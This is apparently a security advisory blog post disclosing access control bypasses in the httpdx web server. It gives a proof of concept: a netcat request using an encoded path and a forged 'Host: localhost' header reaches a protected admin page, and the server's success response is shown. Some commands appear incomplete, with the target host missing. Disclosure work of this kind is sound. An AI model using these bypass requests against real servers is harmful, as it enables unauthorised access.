Just Another Hacker
Author's avatar

httpdx multiple access control bypass

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc. All settings in one config/script file. [ Taken from: http://sourceforge.net/projects/httpdx/ ]

Vulnerability description

Access control in httpdx is done with string matching directives in the configuration file. Request variables are compared to static strings to determine if access should be granted. Examples provided in the default configuration include:

    if<%REQUEST_URI% == "/data/users.txt*">{
                    http.deny = 1;

And another example:

    if<%REQUEST_URI% == "/admin.html*">{
                    http.auth = { //authorization needed for admin's section
                        realm="Stuff for admin only!"

As long as your request does not match these static strings, but the path resolves to the same files you can access the content.

Additionally, as the server doesn’t support traditional binding of virtualhosts to network interfaces you must configure virtualhost specific behaviour through similar string matching directives.

    if<%HTTP_HOST% != "" && %HTTP_HOST% == {localhost,127.*.*.*}>{

The variable HTTP_HOST is set from the Host: header in the request, so in order to access the localhost virtualhost remotely, just set your Host: header to localhost.

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: httpdx - http://sourceforge.net/projects/httpdx/
  • Affected versions: 1.5.5, 1.5.4 and probably earlier versions

Proof of Concept

The server comes with two examples of access control, a restricted file and a password protected administrator area running on localhost. The following examples successfully access these restricted areas remotely:

Access user file:

user@~$ GET

Access admin console:

user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 80
            HTTP/1.1 200 OK
            Date: Thu, 08 Nov 2012 03:25:58 GMT
            Content-Type: text/html
            Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
            Content-Length: 36
            Connection: close
            Server: httpdx/1.5.4 (Win32)
            Pragma: no-cache

Ok, you’re now at admin’s section.


The software appears to be abandoned and the same versions suffers from remote code execution bugs. Use different software instead.

Disclosure time line

  • 12-Feb-2013 - Public disclosure


Static source code analysis tool for finding vulnerabilities in source code.


Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.


All of the project information on one page!